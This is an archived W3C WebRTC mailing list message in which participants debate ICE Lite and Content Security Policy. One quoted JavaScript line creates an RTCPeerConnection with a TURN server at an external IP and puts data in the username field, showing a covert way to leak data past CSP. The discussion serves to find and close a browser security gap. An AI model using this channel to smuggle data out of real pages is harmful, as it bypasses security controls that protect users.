- From: Iñaki Baz Castillo <ibc@aliax.net>
- Date: Fri, 12 Jan 2018 13:27:02 +0100
- To: Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com>
- Cc: T H Panton <thp@westhawk.co.uk>, "public-webrtc@w3.org" <public-webrtc@w3.org>, Cullen Jennings <fluffy@iii.ca>
On 12 January 2018 at 13:06, Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com> wrote: > On 12/01/2018 13:01, Iñaki Baz Castillo wrote: > > To summarize: The current issue with ICE Lite is that it's not needed > > for the browser (ICE controlling) to provide the remote with the > browser *internally* and *dynamically* generated tokens (such as the > ice-ufrag). With my proposal above, this would change so the JS should > always signal its local ice-ufrag to the remote (otherwise ICE > responses would be discarded). And for that, the JS must send it via > HTTP/WebSocket, so habemus CSP rules to block them. > > As I already pointed out in the issue, it is possible to leak small amounts > of data just with: > > var pc = new > RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]}); > pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); And as I already pointed out, my proposal above was just intended to make both, Full ICE and ICE Lite, equally safe. :) Leaking data via TURN credentials is a different subject (not less important).
Received on Friday, 12 January 2018 12:27:46 UTC